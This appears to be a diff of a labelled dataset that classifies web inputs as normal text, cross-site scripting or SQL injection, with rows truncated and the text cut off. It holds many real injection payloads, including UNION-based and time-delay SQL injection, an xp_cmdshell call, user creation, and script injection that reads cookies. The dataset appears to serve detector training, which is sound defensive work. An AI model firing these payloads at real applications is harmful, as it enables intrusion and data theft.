-"{""id"":null,""name"":""Primeape""}",0,normal,27541 -"-4905"" union all select 6082,6082--",2,SQLi,19035 -"1"" ) as zjwu where 9963 = 9963 or 8514 = benchmark",2,SQLi,18990 -1'+ ( select iwbs where 4939 = 4939,2,SQLi,14629 -"<wbr draggable=""true"" ondrag=""alert(1)"">test</wbr>",1,XSS,3899 -ORDER BY 31337,2,SQLi,10335 -<tbody onpointerout=alert(1)>XSS</tbody>,1,XSS,6745 -"<style>@keyframes x{}</style><frameset style=""anim",1,XSS,7920 -In 1857 he was select preacher at his university.,0,normal,26018 -select ( case when ( 3672 = 8360 ) then 3672 else ,2,SQLi,16218 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6157 -"<td oncut=""alert(1)"" contenteditable>test</td>",1,XSS,3313 -select ( case when ( 9393 = 5530 ) then 9393 else ,2,SQLi,15116 -"ABC<div style=""x:\x00expression(javascript:alert(1",1,XSS,480 -"<;IMG SRC="";http://www.thesiteyouareon.com/somecom",1,XSS,1597 -1%' ) or sleep ( 5 ) #,2,SQLi,21512 -1,0,normal,26707 -"1"" and 6240 = ( 'qqpjq'|| ( select case 6240 when ",2,SQLi,16659 -"{""id"":null,""name"":""pound""}",0,normal,27120 -select * from users where id = '1' or @ 1 = 1 unio,2,SQLi,11904 -"This arrangement lasted until 1565, when the burge",0,normal,25304 -"1"" ) ) ) and 6537 = dbms_pipe.receive_message ( ch",2,SQLi,13446 -"-2086%' ) ) ) or make_set ( 9354 = 9354,7185 ) and",2,SQLi,19215 -UNION ALL SELECT NULL--,2,SQLi,10680 -"select count ( * ) from generate_series ( 1,500000",2,SQLi,13672 -; exec master..xp_cmdshell 'ping 10.10.1.2'--,2,SQLi,10039 -alert(1);,1,XSS,9474 -<keygen onpointerenter=alert(1)>XSS</keygen>,1,XSS,8474 -"1%"" ) and 4241 = convert ( int, ( select char ( 11",2,SQLi,17892 -1 ) as nxmd where 8650 = 8650,2,SQLi,16546 -or SLEEP(5),2,SQLi,10380 -"<output onbeforecopy=""alert(1)"" contenteditable>te",1,XSS,8840 -1 and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr,2,SQLi,18320 -select * from users where id = 1 +\. union select ,2,SQLi,11806 --1238' ) as lxur where 7075 = 7075 union all selec,2,SQLi,20354 -1'|| ( select 'homm' where 4937 = 4937 rlike ( sel,2,SQLi,16232 -"1%"" ) ) ) and 6055 = ctxsys.drithsx.sn ( 6055, ( c",2,SQLi,13872 -select ( case when ( 3539 = 8768 ) then 3539 else ,2,SQLi,21698 -I want to select a song for our dance routine.,0,normal,23872 -"<bdo onbeforepaste=""alert(1)"" contenteditable>test",1,XSS,5716 -"<dd onmouseout=""alert(1)"">test</dd>",1,XSS,1787 -having 1 = 1--,2,SQLi,11902 -1 ) as xtgr where 1545 = 1545,2,SQLi,20538 -"{""id"":null,""firstName"":""Quek"",""lastName"":""Han Kok""",0,normal,27347 -"{""id"":null,""firstName"":""Lang"",""lastName"":""Zhang"",""",0,normal,27313 -"Previously, you'd need to select each app one by o",0,normal,25763 -<div id=x tabindex=1 ondeactivate=alert(1)></div><,1,XSS,7479 -1%' ) and exp ( ~ ( select * from ( select concat ,2,SQLi,20960 -"<style>@keyframes x{}</style><template style=""anim",1,XSS,5719 -"1' ) union all select null,null,null,null,null,nul",2,SQLi,18276 -"select * from generate_series ( 3180,3180,case whe",2,SQLi,17383 -"![a'""`onerror=prompt(document.cookie)](x)\",1,XSS,9416 -<button autofocus onfocus=alert(1)>test</button>,1,XSS,8041 -Select your partner.,0,normal,24835 -select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,14857 +-4325 order by 1--,2,SQLi,20618 +Select a scenic spot.,0,normal,22724 +-2761 or 1144 = 7657-- mfml,2,SQLi,13401 +"<FRAMESET><FRAME SRC=""javascript:document.vulnerab",1,XSS,1501 +"<base onmousedown=""alert(1)"">test</base>",1,XSS,7733 +<div onpointerdown=alert(1)>XSS</div>,1,XSS,7573 +<q onpointerleave=alert(1)>XSS</q>,1,XSS,6197 +Update the shopping list.,0,normal,22545 +1' ) ) ) and ( select 2* ( if ( ( select * from ( ,2,SQLi,14745 +select * from users where id = 1 or $<\. or 1 = 1 ,2,SQLi,11749 +"<bdi onbeforepaste=""alert(1)"" contenteditable>test",1,XSS,8304 +"1"" ) union all select null,null--",2,SQLi,17354 +<br id=x tabindex=1 ondeactivate=alert(1)></br><in,1,XSS,4963 +1' ) ) or 7417 = ( select count ( * ) from sysibm.,2,SQLi,13832 +1 ( select ( case when ( 4587 = 4587 ) then regexp,2,SQLi,21501 +<<SCRIPT>document.vulnerable=true;//<</SCRIPT>,1,XSS,1479 +"{""id"":null,""name"":""note""}",0,normal,26781 +"1' ) ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,12272 +"<header onbeforepaste=""alert(1)"" contenteditable>t",1,XSS,4367 +"When you've finished, select ""Done"" and press X, o",0,normal,25139 +But then it was time to select a foreign leader.,0,normal,26303 +"union ( select NULL, NULL, NULL, NULL, ( select @@",2,SQLi,11861 +"1%"" or 7417 = ( select count ( * ) from sysibm.sys",2,SQLi,16311 +"1"" ) ) as swwb where 4244 = 4244",2,SQLi,21373 +"-8410"" or 5023 = ctxsys.drithsx.sn ( 5023, ( chr (",2,SQLi,13008 +1 or exp ( ~ ( select * from ( select concat ( 0x7,2,SQLi,17245 +"<style>@keyframes x{}</style><optgroup style=""anim",1,XSS,5736 +"1 where 6965 = 6965 and elt ( 3933 = 1232,1232 ) -",2,SQLi,20688 +"-3747"" ) union all select 8962,8962,8962,8962,8962",2,SQLi,21756 +select * from users where id = 1. or 1 = 1 -- 1,2,SQLi,11581 +"1 and elt ( 2770 = 3669,3669 ) # sfls",2,SQLi,15307 +<command onpointermove=alert(1)>XSS</command>,1,XSS,7702 +Select your favorite book.,0,normal,22658 +1 ) where 1527 = 1527 or 4240 = ( select 4240 from,2,SQLi,19930 +<br onpointerdown=alert(1)>XSS</br>,1,XSS,6642 +"1 ) or elt ( 6272 = 6272,sleep ( 5 ) )",2,SQLi,15379 +"<button oncut=""alert(1)"" contenteditable>test</but",1,XSS,3656 +"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) an",2,SQLi,12836 +"{""id"":null,""name"":""gradually""}",0,normal,26860 +"1, ( select ( case when ( 5141 = 5141 ) then ( asc",2,SQLi,21923 +"<iframe onbeforepaste=""alert(1)"" contenteditable>t",1,XSS,2418 +"1"" ) as hfvz where 7186 = 7186 union all select nu",2,SQLi,14399 +"{""id"":null,""name"":""chemical""}",0,normal,27245 +"<;STYLE type="";text/css"";>;BODY{background:url("";j",1,XSS,1616 +1' ) ) and 8635 = ( select count ( * ) from genera,2,SQLi,19134 +1' ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ),2,SQLi,13794 +"<script>$=1,alert($)</script>",1,XSS,9276 +"1"" ) ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694",2,SQLi,12687 +`'><script>\xE2\x80\x85javascript:alert(509)</scri,1,XSS,8979 +You first select the person you want to text from ,0,normal,25072 +1 ) ) as rpwt where 4103 = 4103 and 3580 = ( selec,2,SQLi,14167 +Where's the church?,0,normal,23532 +The SPDR Materials Select Sector lost 7.8 percent ,0,normal,25372 +"<plaintext draggable=""true"" ondragstart=""alert(1)""",1,XSS,2368 +1'|| ( select 'ptkj' from dual where 6263 = 6263 u,2,SQLi,16733 +"1"" ) where 5129 = 5129 order by 1--",2,SQLi,14238 +"{""id"":null,""name"":""Kuramon""}",0,normal,27412 +<x ondrag=alert(1)>drag this!,1,XSS,9350 +"1"" ) as jiiq where 6847 = 6847",2,SQLi,13823 +1%',2,SQLi,21727 +"<div onpaste=""alert(1)"" contenteditable>test</div>",1,XSS,4789 +"<style>@keyframes x{}</style><span style=""animatio",1,XSS,3999 +"<html onclick=""alert(1)"">test</html>",1,XSS,7077 +"1"" ) where 4172 = 4172 or ( select * from ( select",2,SQLi,20849 +"<frameset onmouseenter=""alert(1)"">test</frameset>",1,XSS,7543 +"1"" ) ) ) and 4595 = 4595#",2,SQLi,13108 +"<shadow onmouseup=""alert(1)"">test</shadow>",1,XSS,3682 +Select a travel destination for a vacation.,0,normal,24122 +1'|| ( select 'oxam' from dual where 7162 = 7162 a,2,SQLi,21388 +"-6097%' ) ) union all select 3990,3990,3990,3990,3",2,SQLi,17769 +-6449' ) ) or 2590 = 2848,2,SQLi,15868 +1 ) ) and 6414 = ( select count ( * ) from rdb$fie,2,SQLi,16702 +-9429' ) order by 1--,2,SQLi,18538 +1%' ) and char ( 120 ) ||char ( 106 ) ||char ( 117,2,SQLi,19188 +-7041' ) where 6307 = 6307 or 5903 = ( 'qqpjq'|| (,2,SQLi,22280 +"1"" ) ) ) and ( select * from ( select ( sleep ( 5 ",2,SQLi,21746 +"-7876%' ) union all select 3909,3909,3909,3909,390",2,SQLi,16589 +1 where 2238 = 2238,2,SQLi,21365 +"<b onclick=""alert(1)"">test</b>",1,XSS,8411 +Select your flavor.,0,normal,24803 +"<source onpaste=""alert(1)"" contenteditable>test</s",1,XSS,4973 +Select a coffee shop to visit.,0,normal,24171 +<base id=x tabindex=1 onactivate=alert(1)></base>,1,XSS,5534 +"1' ) ) union all select null,null,null--",2,SQLi,18633 +"?url=javascript:alert(1)"",",1,XSS,9865 +<script>var script = document.getElementsByTagName,1,XSS,9295 +"<style>@keyframes slidein {}</style><link style=""a",1,XSS,6104 +"<img ondblclick=""alert(1)"">test</img>",1,XSS,6398 +1 or 7552 = ( select count ( * ) from rdb$fields a,2,SQLi,12902 +"<style>@keyframes x{}</style><img style=""animation",1,XSS,6638 +"<ins oncontextmenu=""alert(1)"">test</ins>",1,XSS,5611 +""" or """"^""",2,SQLi,11555 +Select the perfect honeymoon destination.,0,normal,24394 +-7078'|| ( select 'lcza' where 5076 = 5076 union a,2,SQLi,16335 +<summary onpointermove=alert(1)>XSS</summary>,1,XSS,8096 +"-1755%' union all select 2615,2615,2615,2615,2615,",2,SQLi,15160 +"{""id"":null,""firstName"":""Jacob"",""lastName"":""Ong"",""a",0,normal,26894 +"<del onkeydown=""alert(1)"" contenteditable>test</de",1,XSS,4881 +<basefont id=x tabindex=1 onbeforedeactivate=alert,1,XSS,3807 +<plaintext id=x tabindex=1 onfocusin=alert(1)></pl,1,XSS,8774 +else,0,normal,23147 +"<element ondblclick=""alert(1)"">test</element>",1,XSS,6489 +Where's the best place to relax and unwind?,0,normal,23938 +if ( 6624 = 4232 ) select 6624 else drop function ,2,SQLi,19257 +select ( case when ( 9986 = 8342 ) then 9986 else ,2,SQLi,19590 +"<rb onmouseenter=""alert(1)"">test</rb>",1,XSS,7666 +"{""id"":null,""firstName"":""Gunaraj"",""lastName"":""Sundr",0,normal,27022 +1' in boolean mode ) order by 1#,2,SQLi,15499 +1' or 8315 = ( select count ( * ) from sysibm.syst,2,SQLi,13271 +Select a facial mask for skincare.,0,normal,24170 +1' in boolean mode ) and 3580 = ( select count ( *,2,SQLi,21390 +in,0,normal,23138 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10492 +Select pick.,0,normal,24562 +1' ) ) rlike ( select ( case when ( 7689 = 7689 ) ,2,SQLi,21232 +"<nav draggable=""true"" ondragleave=""alert(1)"">test<",1,XSS,7549 +"1' ) ) ) and elt ( 2506 = 2383,2383 ) and ( ( ( 'b",2,SQLi,17791 +"<fieldset onmousedown=""alert(1)"">test</fieldset>",1,XSS,7697 +><img src=1 onerror=alert(1)>.gif,1,XSS,8958 +"First, download the YouTube Gaming app from the Pl",0,normal,26191 +"1%' ) and 3824 = benchmark ( 5000000,md5 ( 0x76555",2,SQLi,18727 +"1"" ) where 3445 = 3445 and elt ( 1212 = 1254,1254 ",2,SQLi,16988 +"1"" where 3484 = 3484 and char ( 107 ) ||char ( 121",2,SQLi,15028 +-1036' ) or 6872 = 6872 and ( 'wvbi' = 'wvbi,2,SQLi,12738 +<br id=x tabindex=1 onbeforedeactivate=alert(1)></,1,XSS,8839 +1 ) ) as rbae where 2049 = 2049 or 6979 = like ( ',2,SQLi,18441 +"-2434' ) ) ) union all select 5509,5509,5509,5509,",2,SQLi,16660 +Select evolve.,0,normal,24775 +"-2500' ) ) ) union all select 6853,6853,6853,6853-",2,SQLi,21598 +"select count ( * ) from all_users t1,all_users t2,",2,SQLi,20910 +<sup id=x tabindex=1 onfocus=alert(1)></sup>,1,XSS,2342 +top['al\x65rt'](1),1,XSS,9384 +"<s draggable=""true"" ondrag=""alert(1)"">test</s>",1,XSS,2915 +"You can select photos from ""All Photos,"" or select",0,normal,25078 +Where's the best place to watch the stars?,0,normal,23820 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,7007 +"iif ( 9134 = 5736,1,1/0 )",2,SQLi,22222 +"-6770' ) ) union all select 1845,1845,1845,1845,18",2,SQLi,19679 +"1' and extractvalue ( 7982,concat ( 0x5c,0x7171706",2,SQLi,17345 +<map onpointerenter=alert(1)>XSS</map>,1,XSS,6230 +"-5218 ) union all select 9677,9677#",2,SQLi,14844 +select * from users where id = '1' union select $ ,2,SQLi,11791 +"UNION SELECT @@VERSION,SLEEP(5),3",2,SQLi,10593 +select sleep ( 5 ) -- waln,2,SQLi,14471 +Order a cheesy pizza.,0,normal,22657 +\u0061lert(1),1,XSS,9397 +-8636' ) ) ) or 4301 = 7212--,2,SQLi,21048 +"1"" ) ) ) and 6969 = ( select 6969 from pg_sleep ( ",2,SQLi,13487 +"<hgroup onmouseover=""alert(1)"">test</hgroup>",1,XSS,7210 +1%' ) ) ) and char ( 109 ) ||char ( 79 ) ||char ( ,2,SQLi,20214 +Select consumer staple ETFs such as the Vanguard C,0,normal,25635 +"<nobr onmouseleave=""alert(1)"">test</nobr>",1,XSS,2479 +"<sup ondblclick=""alert(1)"">test</sup>",1,XSS,8677 +1' where 6135 = 6135,2,SQLi,17092 +1 ) as bpap where 7758 = 7758 or 4240 = ( select 4,2,SQLi,20684 +Can you help me decide where to invest?,0,normal,23756 +"<embed oncontextmenu=""alert(1)"">test</embed>",1,XSS,4561 +"-3378%"" ) ) union all select 9357,9357,9357,9357,9",2,SQLi,19605 +"-9566%"" ) union all select 7973,7973,7973,7973--",2,SQLi,14884 +"<s onmouseenter=""alert(1)"">test</s>",1,XSS,7907 +1' where 3900 = 3900 and 3715 in ( ( char ( 113 ) ,2,SQLi,13930 +Group data where valid.,0,normal,23304 +"{""id"":null,""firstName"":""Arun"",""lastName"":""Kumar"",""",0,normal,27614 +-7561 ) as ilrm where 8828 = 8828 or 5903 = ( 'qqp,2,SQLi,18793 +She'll select her jewelry.,0,normal,24331 +1 ) or 4915 = ( select count ( * ) from domain.dom,2,SQLi,16829 +As the brushes are slowly shifted over on the revo,0,normal,26348 +1 ) waitfor delay '0:0:5' and ( 2993 = 2993,2,SQLi,13620 +"<menu onmouseover=""alert(1)"">test</menu>",1,XSS,7042 +<style>:target {color: red;}</style><dialog id=x s,1,XSS,6440 +1 and 4386 = utl_inaddr.get_host_address ( chr ( 1,2,SQLi,12865 +"<style>@keyframes x{}</style><nextid style=""animat",1,XSS,6024 +select * from users where id = 1 <1## union select,2,SQLi,11492 +"<svg onload=""javascript:alert(123)"" xmlns=""#""></sv",1,XSS,1128 +"<th draggable=""true"" ondrag=""alert(1)"">test</th>",1,XSS,3942 +<dd onpointermove=alert(1)>XSS</dd>,1,XSS,7311 +"{""id"":null,""firstName"":""Ng"",""lastName"":""Beng Tee"",",0,normal,27084 +<object id=x tabindex=1 onbeforeactivate=alert(1)>,1,XSS,6637 +Where's the opera?,0,normal,23582 +"-2296"" union all select 7359,7359,7359,7359,7359,7",2,SQLi,20856 +select sleep ( 5 ) and 'hhrw' like 'hhrw,2,SQLi,21133 +Select charm.,0,normal,24726 +"<;A HREF="";http://0102.0146.0007.00000223/"";>;XSS<",1,XSS,1671 +"""Select ""channel"" on the left menu, then click ""st",0,normal,26455 +Select find.,0,normal,24596 +"1"" and 8635 = ( select count ( * ) from generate_s",2,SQLi,20919 +<xmp onpointerenter=alert(1)>XSS</xmp>,1,XSS,8179 +“><s”%2b”cript>alert(document.cookie)</script>,1,XSS,939 +-3179'+ ( select 'tzzz' where 3191 = 3191 union al,2,SQLi,13480 +Where did you find that serene retreat?,0,normal,23937 +-6067'+ ( select 'bfhf' where 3114 = 3114 union al,2,SQLi,19033 +1' ) ) ) rlike sleep ( 5 ) and ( ( ( 'zwyx' = 'zwy,2,SQLi,18988 +"-4385%' ) ) union all select 6694,6694,6694,6694,6",2,SQLi,14631 +"<plaintext onbeforepaste=""alert(1)"" contenteditabl",1,XSS,3901 +RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d,2,SQLi,10337 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6747 +<canvas onpointerup=alert(1)>XSS</canvas>,1,XSS,7922 +1' ) ) ) or ( select 9173 from ( select count ( * ,2,SQLi,15843 +1 ) and sleep ( 5 ) and ( 4855 = 4855,2,SQLi,16210 +<output onpointermove=alert(1)>XSS</output>,1,XSS,6159 +"<summary onmouseup=""alert(1)"">test</summary>",1,XSS,3315 +"1"" ) or 8421 = ( select count ( * ) from generate_",2,SQLi,15118 +"ABC<div style=""x:\x00expression(javascript:alert(1",1,XSS,480 +Redirect 302 /a.jpg http://victimsite.com/admin.as,1,XSS,1598 +1' ) ) and char ( 120 ) ||char ( 106 ) ||char ( 11,2,SQLi,21510 +1,0,normal,26704 +select ( case when ( 8663 = 7467 ) then 8663 else ,2,SQLi,19577 +1' ) and exp ( ~ ( select * from ( select concat (,2,SQLi,22074 +or pg_sleep ( __TIME__ ) --,2,SQLi,11906 +Extra 10% off select items with code SUPERSAVER (t,0,normal,26203 +"-4347' union all select 6074,6074,6074,6074,6074,6",2,SQLi,13448 +1 rlike sleep ( 5 ) # urxh,2,SQLi,18459 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHA",2,SQLi,10682 +1'+ ( select 'yjpp' where 8966 = 8966,2,SQLi,13674 +create user name identified by pass123 temporary t,2,SQLi,10041 +\x1Cjavascript:javascript:alert(1),1,XSS,9476 +<rb id=x tabindex=1 ondeactivate=alert(1)></rb><in,1,XSS,8476 +call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,17689 +"1"" ) ) as qejm where 9014 = 9014 union all select ",2,SQLi,16544 +waitfor delay '00:00:05',2,SQLi,10382 +"<base onmouseenter=""alert(1)"">test</base>",1,XSS,8842 +-9673 ) or 8571 = 8571--,2,SQLi,18318 +select * from users where id = 1 or \<$ union sele,2,SQLi,11808 +Where's the acupuncture clinic?,0,normal,23633 +1'|| ( select 'mosp' where 6085 = 6085,2,SQLi,16224 +-7962' ) ) as pgqz where 6058 = 6058 or 4493 = utl,2,SQLi,13874 +"-6357"" ) order by 1--",2,SQLi,16523 +Where did you find that breathtaking view?,0,normal,23869 +<applet onpointerdown=alert(1)>XSS</applet>,1,XSS,5718 +<pre id=x tabindex=1 onbeforedeactivate=alert(1)><,1,XSS,1788 +select * from users where id = '1' or @ 1 = 1 unio,2,SQLi,11904 +He selected a classic novel to read on vacation.,0,normal,23733 +Where's the library?,0,normal,23507 +"{""id"":null,""name"":""Krookodile""}",0,normal,27312 +"1"" and 3707 = ( select count ( * ) from sysibm.sys",2,SQLi,20419 +"<multicol draggable=""true"" ondragleave=""alert(1)"">",1,XSS,7481 +"select pg_sleep ( 5 ) and ( ""tpry"" = ""tpry",2,SQLi,21471 +<input onpointerenter=alert(1)>XSS</input>,1,XSS,5721 +select the dog,0,normal,25687 +1'|| ( select 'ifts' from dual where 6329 = 6329,2,SQLi,17381 +[notmalicious](javascript:window.onerror=alert;thr,1,XSS,9418 +<figure onfocusout=alert(1) tabindex=1 id=x></figu,1,XSS,8043 +"{""id"":null,""firstName"":""Nurul"",""lastName"":""Atiqah""",0,normal,27274 +-6789'|| ( select 'uckz' from dual where 2163 = 21,2,SQLi,14859 "<var onmouseover=""prompt(1)"">On Mouse Over</var>",1,XSS,884 -Select explore.,0,normal,24652 +Select travel.,0,normal,24649 "<a href=""javascript\x0D:javascript:alert(1)"" id=""f",1,XSS,544 -<svg><acronym onload=alert(1)></acronym>,1,XSS,8760 -"<body draggable=""true"" ondrag=""alert(1)"">test</bod",1,XSS,8799 -"-9451%"" ) union all select 9963,9963,9963--",2,SQLi,18883 -1'+ ( select wpbj where 1849 = 1849,2,SQLi,19805 -"select * from users where id = 1 or 1#"", = 1 or 1 ",2,SQLi,11742 -1' ) and ( select 2* ( if ( ( select * from ( sele,2,SQLi,17931 -1' ) ) ) and 8407 = ( select count ( * ) from gene,2,SQLi,17051 -"<tbody onmouseout=""alert(1)"">test</tbody>",1,XSS,4920 -1' and 5556 = ( select count ( * ) from all_users ,2,SQLi,15620 -"-8684 union all select 9519,9519,9519,9519--",2,SQLi,17894 -1' ) ) and 5556 = ( select count ( * ) from all_us,2,SQLi,16236 -"Kohl's: 3-Day Sale: Save on select bed & bath, kit",0,normal,25918 -Select your battle.,0,normal,24915 -Join the club.,0,normal,22823 -A Select Committee of the House of Commons had rec,0,normal,26422 -<style>:target {transform: rotate(180deg);}</style,1,XSS,1978 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10796 -"-7111 union all select 2409,2409,2409,2409,2409,24",2,SQLi,19506 -Now you can tap the cursor to pick it up and drag ,0,normal,25859 -RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d,2,SQLi,10337 -"1"" ) ) and 5421 = 4804--",2,SQLi,15137 -1'+ ( select 'vddk' where 6961 = 6961,2,SQLi,19798 -<style>:target {transform: rotate(180deg);}</style,1,XSS,4458 -<head id=x tabindex=1 onbeforeactivate=alert(1)></,1,XSS,5741 -<em id=x tabindex=1 onbeforedeactivate=alert(1)></,1,XSS,2161 -"-8490 ) ) union all select 6910,6910,6910,6910,691",2,SQLi,12622 -"<output draggable=""true"" ondragenter=""alert(1)"">te",1,XSS,7821 +<style>:target {color: red;}</style><image id=x st,1,XSS,8762 +<blink onpointerleave=alert(1)>XSS</blink>,1,XSS,8801 +1'+ ( select brgo where 9100 = 9100 or 4240 = ( se,2,SQLi,18881 +"1"" ) order by 1#",2,SQLi,22178 +select * from users where id = 1.%@ or 1 = 1 -- 1,2,SQLi,11744 +-5286' or 6783 = 1233,2,SQLi,17929 +"1"" ) ) ) and make_set ( 7809 = 9564,9564 ) and ( (",2,SQLi,21505 +"<table onkeypress=""alert(1)"" contenteditable>test<",1,XSS,4922 +"-4012"" ) or make_set ( 9354 = 9354,7185 ) and ( ""c",2,SQLi,15622 +Select a comfortable chair.,0,normal,22594 +1 and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||,2,SQLi,16228 +Lady Macbeth is out in select U.S. theaters tomorr,0,normal,25915 +Select your disagreement.,0,normal,24912 +Modify the game.,0,normal,22820 +"A select few, however, collect shoes — lots of the",0,normal,26419 +<link onblur=alert(1) tabindex=1 id=x></link><inpu,1,XSS,1979 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10798 +"Simply select the layer you wish to paint onto, ma",0,normal,25546 +"Now, we may select any definite quantity of work w",0,normal,25856 +IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl-,2,SQLi,10339 +( select ( case when ( 3531 = 3531 ) then ( select,2,SQLi,15139 +1'+ ( select 'tzey' where 4491 = 4491 union all se,2,SQLi,18644 +<font id=x tabindex=1 onactivate=alert(1)></font>,1,XSS,4460 +<style>:target {transform: rotate(180deg);}</style,1,XSS,5743 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2162 +"1"" union all select null,null,null,null--",2,SQLi,12624 +<tt onpointerup=alert(1)>XSS</tt>,1,XSS,7823 "&lt;IMG SRC=\""mocha&#58;&#91;code&#93;\""&gt;",1,XSS,991 -"1%"" ) ) and 9254 = ( select count ( * ) from rdb$f",2,SQLi,21602 -Select from 30 different games by scrolling throug,0,normal,25629 -1' ) ) and ( select 9067 from ( select count ( * ),2,SQLi,15594 -select,0,normal,26593 -"<output onkeyup=""alert(1)"" contenteditable>test</o",1,XSS,5435 -Select a movie.,0,normal,24805 -Select your dream wedding song.,0,normal,24406 -select * from users where id = 1 or \+<$ union sel,2,SQLi,11514 -1' where 8635 = 8635 order by 1--,2,SQLi,18524 --6722' ) order by 1#,2,SQLi,17967 -"1"" ) ) waitfor delay '0:0:5' and ( ( ""witb"" = ""wit",2,SQLi,13701 -I need to decide where to hold the conference.,0,normal,23718 -"1"" where 5334 = 5334 or exp ( ~ ( select * from ( ",2,SQLi,12975 -select * from users where id = 1 + ( \. ) or 1 = 1,2,SQLi,11597 +1' ) ) and 6969 = ( select 6969 from pg_sleep ( 5 ,2,SQLi,21600 +Select from translucent vellum to reveal the color,0,normal,25626 +"1%"" ) ) ) or updatexml ( 1808,concat ( 0x2e,0x7171",2,SQLi,15596 +select,0,normal,26590 +"<datalist oncontextmenu=""alert(1)"">test</datalist>",1,XSS,5437 +Select a book.,0,normal,24802 +Select the best wedding photographer.,0,normal,24403 +select * from users where id = 1.&&1 union select ,2,SQLi,11516 +else dbms_lock.sleep ( 0 ),2,SQLi,20206 +"1"" where 7015 = 7015",2,SQLi,17965 +-2707' ) ) ) or ( 8459 = 8459 ) *4906 and ( ( ( 'm,2,SQLi,13703 +I'm thinking of where to spend my evening.,0,normal,23715 +1 or ( select * from ( select ( sleep ( 5 ) ) ) sd,2,SQLi,12977 +0 or 1 = 1,2,SQLi,11599 "<a href=""\x19javascript:javascript:alert(1)"" id=""f",1,XSS,511 -"-9337 ) union all select 5648,5648,5648,5648,5648#",2,SQLi,14243 -a' or 1=1--,2,SQLi,10130 --9975 where 9760 = 9760 order by 1--,2,SQLi,20262 -<style>:target {color:red;}</style><script id=x st,1,XSS,8349 --6377'|| ( select 'ryin' where 2113 = 2113 union a,2,SQLi,17098 -"<root/>//[""'`-->]]>]</div>",1,XSS,9244 -"<shadow onbeforecopy=""alert(1)"" contenteditable>te",1,XSS,8195 +"1"" ) as vcir where 6275 = 6275 and char ( 109 ) ||",2,SQLi,14245 +declare @s varchar(22) select @s =,2,SQLi,10132 +"1 ) ) union all select null,null,null,null,null,nu",2,SQLi,20260 +"<rb draggable=""true"" ondragenter=""alert(1)"">test</",1,XSS,8351 +"-5959"" or 2477 = 1144",2,SQLi,17096 +"<sCrIpt/""<a""/srC=data:="".<a,[8].some(confirm)>",1,XSS,9246 +<label onpointermove=alert(1)>XSS</label>,1,XSS,8197 <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerher,1,XSS,840 -1 ) where 5465 = 5465 or 8315 = ( select count ( *,2,SQLi,14933 -"1"" ) ) or row ( 1045,7562 ) > ( select count ( * )",2,SQLi,21877 -"1"" ) ) ) rlike ( select ( case when ( 7689 = 7689 ",2,SQLi,22460 -"{""id"":null,""name"":""bow""}",0,normal,27463 -1 ) ) ) and 8514 = ( select count ( * ) from domai,2,SQLi,13820 -"<del oncopy=""alert(1)"" contenteditable>test</del>",1,XSS,3958 -"1%"" and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,13358 -"<small onpaste=""alert(1)"" contenteditable>test</sm",1,XSS,4840 -"<rt onkeyup=""alert(1)"" contenteditable>test</rt>",1,XSS,4890 -I need to decide where to go for a concert.,0,normal,23795 +"1"" ) ) and 8514 = ( select count ( * ) from domain",2,SQLi,14935 +"-3230"" ) ) as kbxc where 5007 = 5007 or 2107 = 881",2,SQLi,21875 +1' ) where 8167 = 8167,2,SQLi,22457 +Select your objective.,0,normal,24844 +1'|| ( select 'feki' where 4082 = 4082 and ( 3587 ,2,SQLi,13822 +"<ins draggable=""true"" ondragleave=""alert(1)"">test<",1,XSS,3960 +1' ) ) as fwhv where 3921 = 3921 union all select ,2,SQLi,13360 +"<audio onkeydown=""alert(1)"" contenteditable>test</",1,XSS,4842 +"<hgroup oncut=""alert(1)"" contenteditable>test</hgr",1,XSS,4892 +Let's find out where the nearest bus stop is.,0,normal,23792 "<IMG STYLE=""xss:expr/*XSS*/ession(javascript:alert",1,XSS,763 -Select mall.,0,normal,24551 -"BUENOS AIRES ""Powder Her Face,"" Teatro Colón Selec",0,normal,26317 -"<data oncut=""alert(1)"" contenteditable>test</data>",1,XSS,4841 -1'|| ( select 'wqmz' where 6400 = 6400 and row ( 6,2,SQLi,14254 -"1"" ) as cnrh where 8524 = 8524 and 3824 = benchmar",2,SQLi,20854 -1 where 7452 = 7452 or 4240 = ( select 4240 from p,2,SQLi,15890 -1' ) ) as qqvk where 1007 = 1007,2,SQLi,13843 -"<html onclick=""alert(1)"">test</html>",1,XSS,7077 -<BODY ONLOAD=alert(’XSS’)>,1,XSS,1143 -select * from users where id = '1' <@<@ union sele,2,SQLi,11656 -<select onpointermove=alert(1)>XSS</select>,1,XSS,6190 -"1"" ) ) as vbpl where 3885 = 3885 and 6969 = ( sele",2,SQLi,12204 -"{""id"":null,""name"":""stream light""}",0,normal,27607 -1' ) waitfor delay '0:0:5' and ( 'fpnh' = 'fpnh,2,SQLi,17674 -"select * from users where id = 1 or 1#""$ union sel",2,SQLi,11921 -1 ) where 2741 = 2741 and 6414 = ( select count ( ,2,SQLi,17876 -"1"" ) and 4760 = 2922",2,SQLi,15972 -<style>:target {transform: rotate(180deg);}</style,1,XSS,5462 -"1' and make_set ( 9860 = 6956,6956 ) and 'toru' = ",2,SQLi,22398 -"<li ondblclick=""alert(1)"">test</li>",1,XSS,5157 -"<dd onbeforecopy=""alert(1)"" contenteditable>test</",1,XSS,1802 -"<title draggable=""true"" ondragenter=""alert(1)"">tes",1,XSS,4757 -")) AND 